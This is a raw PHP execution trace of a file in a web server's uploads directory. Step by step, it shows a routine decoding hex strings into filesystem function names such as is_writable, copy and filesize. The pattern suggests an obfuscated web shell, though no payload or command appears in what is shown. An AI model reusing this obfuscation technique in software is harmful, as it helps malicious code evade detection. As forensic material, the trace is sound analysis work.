2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	87	0	0.005004	719936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	87	1	0.005018	719984
3	87	R			116
3	88	0	0.005033	719904	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	88	1	0.005050	719944
3	88	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	68	1	0.005088	719904
2	68	R			'preg_split'
1		A						/var/www/html/uploads/1CTT.php	7	$func[4] = 'preg_split'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	89	0	0.005131	719904	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'61727261795f64696666'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 19
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	90	0	0.005183	719936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	90	1	0.005201	719984
3	90	R			97
3	91	0	0.005217	719904	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	91	1	0.005230	719944
3	91	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	92	0	0.005268	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	92	1	0.005282	720016
3	92	R			114
3	93	0	0.005298	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	93	1	0.005317	719976
3	93	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	94	0	0.005358	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	94	1	0.005373	720016
3	94	R			114
3	95	0	0.005390	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	95	1	0.005405	719976
3	95	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	96	0	0.005446	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	96	1	0.005460	720016
3	96	R			97
3	97	0	0.005476	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	97	1	0.005491	719976
3	97	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	98	0	0.005529	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	98	1	0.005542	720016
3	98	R			121
3	99	0	0.005559	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	99	1	0.005572	719976
3	99	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	100	0	0.005610	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	100	1	0.005624	720016
3	100	R			95
3	101	0	0.005639	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	101	1	0.005654	719976
3	101	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	102	0	0.005695	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	102	1	0.005709	720016
3	102	R			100
3	103	0	0.005725	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	103	1	0.005738	719976
3	103	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	104	0	0.005776	719968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	104	1	0.005790	720016
3	104	R			105
3	105	0	0.005805	719936	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	105	1	0.005819	719976
3	105	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	106	0	0.005856	719976	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	106	1	0.005869	720024
3	106	R			102
3	107	0	0.005886	719944	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	107	1	0.005899	719984
3	107	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	108	0	0.005935	719976	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	108	1	0.005949	720024
3	108	R			102
3	109	0	0.005965	719944	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	109	1	0.005977	719984
3	109	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	89	1	0.006026	719944
2	89	R			'array_diff'
1		A						/var/www/html/uploads/1CTT.php	7	$func[5] = 'array_diff'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	110	0	0.006072	719944	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'69735f646972'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	111	0	0.006122	719976	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	111	1	0.006136	720024
3	111	R			105
3	112	0	0.006152	719944	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	112	1	0.006166	719984
3	112	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	113	0	0.006203	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	113	1	0.006218	720056
3	113	R			115
3	114	0	0.006235	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	114	1	0.006248	720016
3	114	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	115	0	0.006285	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	115	1	0.006300	720056
3	115	R			95
3	116	0	0.006315	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	116	1	0.006328	720016
3	116	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	117	0	0.006366	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	117	1	0.006380	720056
3	117	R			100
3	118	0	0.006399	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	118	1	0.006413	720016
3	118	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	119	0	0.006550	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	119	1	0.006565	720056
3	119	R			105
3	120	0	0.006580	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	120	1	0.006594	720016
3	120	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	121	0	0.006641	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	121	1	0.006658	720056
3	121	R			114
3	122	0	0.006672	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	122	1	0.006687	720016
3	122	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	110	1	0.006730	719976
2	110	R			'is_dir'
1		A						/var/www/html/uploads/1CTT.php	7	$func[6] = 'is_dir'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	123	0	0.006773	719976	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'69735f66696c65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	124	0	0.006824	720008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	124	1	0.006840	720056
3	124	R			105
3	125	0	0.006853	719976	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	125	1	0.006865	720016
3	125	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	126	0	0.006896	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	126	1	0.006909	720088
3	126	R			115
3	127	0	0.006921	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	127	1	0.006933	720048
3	127	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	128	0	0.006963	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	128	1	0.006975	720088
3	128	R			95
3	129	0	0.006987	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	129	1	0.006998	720048
3	129	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	130	0	0.007029	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	130	1	0.007040	720088
3	130	R			102
3	131	0	0.007053	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	131	1	0.007064	720048
3	131	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	132	0	0.007102	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	132	1	0.007117	720088
3	132	R			105
3	133	0	0.007131	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	133	1	0.007145	720048
3	133	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	134	0	0.007184	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	134	1	0.007200	720088
3	134	R			108
3	135	0	0.007217	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	135	1	0.007232	720048
3	135	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	136	0	0.007273	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	136	1	0.007289	720088
3	136	R			101
3	137	0	0.007309	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	137	1	0.007325	720048
3	137	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	123	1	0.007362	720008
2	123	R			'is_file'
1		A						/var/www/html/uploads/1CTT.php	7	$func[7] = 'is_file'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	138	0	0.007403	720008	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'69735f7772697461626c65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	139	0	0.007456	720040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	139	1	0.007472	720088
3	139	R			105
3	140	0	0.007487	720008	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	140	1	0.007501	720048
3	140	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	141	0	0.007541	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	141	1	0.007554	720120
3	141	R			115
3	142	0	0.007566	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	142	1	0.007578	720080
3	142	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	143	0	0.007613	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	143	1	0.007625	720120
3	143	R			95
3	144	0	0.007637	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	144	1	0.007648	720080
3	144	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	145	0	0.007679	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'77'
3	145	1	0.007690	720120
3	145	R			119
3	146	0	0.007703	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	119
3	146	1	0.007714	720080
3	146	R			'w'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	147	0	0.007744	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	147	1	0.007756	720120
3	147	R			114
3	148	0	0.007768	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	148	1	0.007779	720080
3	148	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	149	0	0.007814	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	149	1	0.007829	720120
3	149	R			105
3	150	0	0.007843	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	150	1	0.007856	720080
3	150	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	151	0	0.007962	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	151	1	0.007977	720120
3	151	R			116
3	152	0	0.007994	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	152	1	0.008010	720080
3	152	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	153	0	0.008051	720072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	153	1	0.008066	720120
3	153	R			97
3	154	0	0.008081	720040	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	154	1	0.008095	720080
3	154	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	155	0	0.008134	720080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	155	1	0.008148	720128
3	155	R			98
3	156	0	0.008164	720048	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	156	1	0.008179	720088
3	156	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	157	0	0.008218	720080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	157	1	0.008232	720128
3	157	R			108
3	158	0	0.008248	720048	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	158	1	0.008261	720088
3	158	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	159	0	0.008298	720080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	159	1	0.008311	720128
3	159	R			101
3	160	0	0.008326	720048	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	160	1	0.008339	720088
3	160	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	138	1	0.008376	720048
2	138	R			'is_writable'
1		A						/var/www/html/uploads/1CTT.php	7	$func[8] = 'is_writable'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	161	0	0.008420	720048	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'69735f7265616461626c65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	162	0	0.008471	720080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	162	1	0.008484	720128
3	162	R			105
3	163	0	0.008500	720048	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	163	1	0.008525	720088
3	163	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	164	0	0.008567	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	164	1	0.008580	720160
3	164	R			115
3	165	0	0.008592	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	165	1	0.008603	720120
3	165	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	166	0	0.008634	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	166	1	0.008646	720160
3	166	R			95
3	167	0	0.008659	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	167	1	0.008670	720120
3	167	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	168	0	0.008700	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	168	1	0.008713	720160
3	168	R			114
3	169	0	0.008725	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	169	1	0.008736	720120
3	169	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	170	0	0.008766	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	170	1	0.008777	720160
3	170	R			101
3	171	0	0.008789	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	171	1	0.008800	720120
3	171	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	172	0	0.008830	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	172	1	0.008841	720160
3	172	R			97
3	173	0	0.008854	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	173	1	0.008865	720120
3	173	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	174	0	0.008895	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	174	1	0.008906	720160
3	174	R			100
3	175	0	0.008918	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	175	1	0.008929	720120
3	175	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	176	0	0.008959	720112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	176	1	0.008970	720160
3	176	R			97
3	177	0	0.008982	720080	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	177	1	0.008993	720120
3	177	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	178	0	0.009022	720120	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	178	1	0.009034	720168
3	178	R			98
3	179	0	0.009047	720088	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	179	1	0.009058	720128
3	179	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	180	0	0.009088	720120	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	180	1	0.009099	720168
3	180	R			108
3	181	0	0.009111	720088	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	181	1	0.009122	720128
3	181	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	182	0	0.009152	720120	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	182	1	0.009164	720168
3	182	R			101
3	183	0	0.009177	720088	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	183	1	0.009188	720128
3	183	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	161	1	0.009217	720088
2	161	R			'is_readable'
1		A						/var/www/html/uploads/1CTT.php	7	$func[9] = 'is_readable'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	184	0	0.009252	720088	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c6573697a65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	185	0	0.009297	720120	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	185	1	0.009308	720168
3	185	R			102
3	186	0	0.009321	720088	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	186	1	0.009332	720128
3	186	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	187	0	0.009363	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	187	1	0.009374	720200
3	187	R			105
3	188	0	0.009386	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	188	1	0.009398	720160
3	188	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	189	0	0.009428	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	189	1	0.009439	720200
3	189	R			108
3	190	0	0.009451	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	190	1	0.009462	720160
3	190	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	191	0	0.009493	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	191	1	0.009504	720200
3	191	R			101
3	192	0	0.009516	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	192	1	0.009528	720160
3	192	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	193	0	0.009557	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	193	1	0.009569	720200
3	193	R			115
3	194	0	0.009581	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	194	1	0.009592	720160
3	194	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	195	0	0.009623	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	195	1	0.009634	720200
3	195	R			105
3	196	0	0.009647	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	196	1	0.009657	720160
3	196	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	197	0	0.009688	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'7a'
3	197	1	0.009699	720200
3	197	R			122
3	198	0	0.009711	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	122
3	198	1	0.009722	720160
3	198	R			'z'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'z'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	199	0	0.009752	720152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	199	1	0.009806	720200
3	199	R			101
3	200	0	0.009819	720120	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	200	1	0.009831	720160
3	200	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	184	1	0.009862	720128
2	184	R			'filesize'
1		A						/var/www/html/uploads/1CTT.php	7	$func[10] = 'filesize'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	201	0	0.009897	720128	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'636f7079'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	202	0	0.009938	720160	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	202	1	0.009949	720208
3	202	R			99
3	203	0	0.009962	720128	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	203	1	0.009973	720168
3	203	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	204	0	0.010004	720192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	204	1	0.010016	720240
3	204	R			111
3	205	0	0.010029	720160	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	205	1	0.010045	720200
3	205	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	206	0	0.010077	720192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	206	1	0.010088	720240
3	206	R			112
3	207	0	0.010101	720160	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	207	1	0.010112	720200
3	207	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	208	0	0.010142	720192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	208	1	0.010153	720240
3	208	R			121
3	209	0	0.010166	720160	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	209	1	0.010177	720200
3	209	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	201	1	0.010207	720160
2	201	R			'copy'
1		A						/var/www/html/uploads/1CTT.php	7	$func[11] = 'copy'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	210	0	0.010240	720160	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c655f657869737473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	211	0	0.010282	720192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	211	1	0.010294	720240
3	211	R			102
3	212	0	0.010306	720160	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	212	1	0.010318	720200
3	212	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	213	0	0.010348	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	213	1	0.010360	720272
3	213	R			105
3	214	0	0.010373	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	214	1	0.010384	720232
3	214	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	215	0	0.010414	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	215	1	0.010426	720272
3	215	R			108
3	216	0	0.010439	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	216	1	0.010450	720232
3	216	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	217	0	0.010481	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	217	1	0.010493	720272
3	217	R			101
3	218	0	0.010505	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	218	1	0.010517	720232
3	218	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	219	0	0.010547	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	219	1	0.010559	720272
3	219	R			95
3	220	0	0.010571	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	220	1	0.010582	720232
3	220	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	221	0	0.010623	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	221	1	0.010637	720272
3	221	R			101
3	222	0	0.010649	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	222	1	0.010661	720232
3	222	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	223	0	0.010690	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	223	1	0.010702	720272
3	223	R			120
3	224	0	0.010714	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	224	1	0.010725	720232
3	224	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	225	0	0.010756	720224	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	225	1	0.010767	720272
3	225	R			105
3	226	0	0.010783	720192	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	226	1	0.010795	720232
